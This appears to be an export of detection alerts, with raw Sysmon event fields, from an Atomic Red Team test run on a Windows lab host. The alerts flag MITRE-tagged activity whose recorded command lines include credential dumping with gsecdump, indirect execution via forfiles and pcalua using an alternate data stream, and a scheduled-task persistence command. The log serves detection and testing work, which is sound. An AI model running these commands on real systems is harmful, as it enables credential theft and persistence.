SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1,"
1
5
4
1
0
0x8000000000000000
4113
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:16.975
747F3D96-DD94-5D31-0000-0010F4864A00
3920
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "gsecdump -a"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1,"
1
5
4
1
0
0x8000000000000000
4113
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:16.975
747F3D96-DD94-5D31-0000-0010F4864A00
3920
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "gsecdump -a"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4111
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-19 15:11:03.652
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49744
false
151.101.0.133
443
https
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( "C:\Windows\system32\whoami.exe" /user) ,1,"
1
5
4
1
0
0x8000000000000000
4110
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:07.987
747F3D96-DD8B-5D31-0000-001094584A00
5792
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /user
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1,"
1
5
4
1
0
0x8000000000000000
4110
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:07.987
747F3D96-DD8B-5D31-0000-001094584A00
5792
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /user
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1,"
1
5
4
1
0
0x8000000000000000
4108
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:09:59.829
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell
c:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-DD37-5D31-0000-00109D4C4900
5632
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"
1
5
4
1
0
0x8000000000000000
4108
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:09:59.829
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell
c:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-DD37-5D31-0000-00109D4C4900
5632
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
4107
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:09:43.301
747F3D96-DD37-5D31-0000-00109D4C4900
5632
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D4B8-5D31-0000-0010A8CE0600
4416
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4105
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-19 14:57:52.847
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49734
false
151.101.0.133
443
https
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4104
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:55.181
747F3D96-DA73-5D31-0000-001061933F00
1724
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1,"
1
5
4
1
0
0x8000000000000000
4103
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:55.056
747F3D96-DA73-5D31-0000-0010918F3F00
4092
C:\Windows\System32\forfiles.exe
10.0.17763.1 (WinBuild.160101.0800)
ForFiles - Executes a command on selected files
Microsoft® Windows® Operating System
Microsoft Corporation
forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80
747F3D96-DA73-5D31-0000-00106A8D3F00
1052
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ),1,"
1
5
4
1
0
0x8000000000000000
4102
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:55.024
747F3D96-DA73-5D31-0000-00106A8D3F00
1052
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"
1
5
4
1
0
0x8000000000000000
4100
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:54.123
747F3D96-DA72-5D31-0000-001056513F00
3680
C:\Windows\System32\forfiles.exe
10.0.17763.1 (WinBuild.160101.0800)
ForFiles - Executes a command on selected files
Microsoft® Windows® Operating System
Microsoft Corporation
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80
747F3D96-DA72-5D31-0000-0010044F3F00
1300
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" ),1,"
1
5
4
1
0
0x8000000000000000
4099
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:54.080
747F3D96-DA72-5D31-0000-0010044F3F00
1300
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4098
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:53.815
747F3D96-DA71-5D31-0000-00101A463F00
6168
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1,"
1
5
4
1
0
0x8000000000000000
4097
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:52.816
747F3D96-DA70-5D31-0000-00100E2C3F00
112
C:\Windows\System32\pcalua.exe
10.0.17763.1 (WinBuild.160101.0800)
Program Compatibility Assistant
Microsoft® Windows® Operating System
Microsoft Corporation
pcalua.exe -a C:\Windows\system32\javacpl.cpl
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653
747F3D96-DA70-5D31-0000-001007293F00
608
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" ),1,"
1
5
4
1
0
0x8000000000000000
4096
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:52.784
747F3D96-DA70-5D31-0000-001007293F00
608
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1,"
1
5
4
1
0
0x8000000000000000
4095
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:50.232
747F3D96-DA6E-5D31-0000-001081F93E00
1284
C:\Windows\System32\pcalua.exe
10.0.17763.1 (WinBuild.160101.0800)
Program Compatibility Assistant
Microsoft® Windows® Operating System
Microsoft Corporation
pcalua.exe -a Java
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653
747F3D96-DA6E-5D31-0000-0010D8F63E00
3316
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ),1,"
1
5
4
1
0
0x8000000000000000
4094
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:50.198
747F3D96-DA6E-5D31-0000-0010D8F63E00
3316
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1,"
1
5
4
1
0
0x8000000000000000
4093
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:47.232
747F3D96-DA6B-5D31-0000-00102DD33E00
5348
C:\Windows\System32\pcalua.exe
10.0.17763.1 (WinBuild.160101.0800)
Program Compatibility Assistant
Microsoft® Windows® Operating System
Microsoft Corporation
pcalua.exe -a -c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653
747F3D96-DA6B-5D31-0000-0010CCD03E00
5332
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ),1,"
1
5
4
1
0
0x8000000000000000
4092
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:47.195
747F3D96-DA6B-5D31-0000-0010CCD03E00
5332
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4091
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:46.915
747F3D96-DA6A-5D31-0000-00104BC83E00
888
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1,"
1
5
4
1
0
0x8000000000000000
4090
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Persistence - Scheduled Task Management
2019-07-19 14:57:46.845
747F3D96-DA6A-5D31-0000-0010C5C43E00
3352
C:\Windows\System32\schtasks.exe
10.0.17763.1 (WinBuild.160101.0800)
Task Scheduler Configuration Tool
Microsoft® Windows® Operating System
Microsoft Corporation
SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
747F3D96-DA6A-5D31-0000-001074C23E00
3872
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ),1,"
1
5
4
1
0
0x8000000000000000
4089
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:46.814
747F3D96-DA6A-5D31-0000-001074C23E00
3872
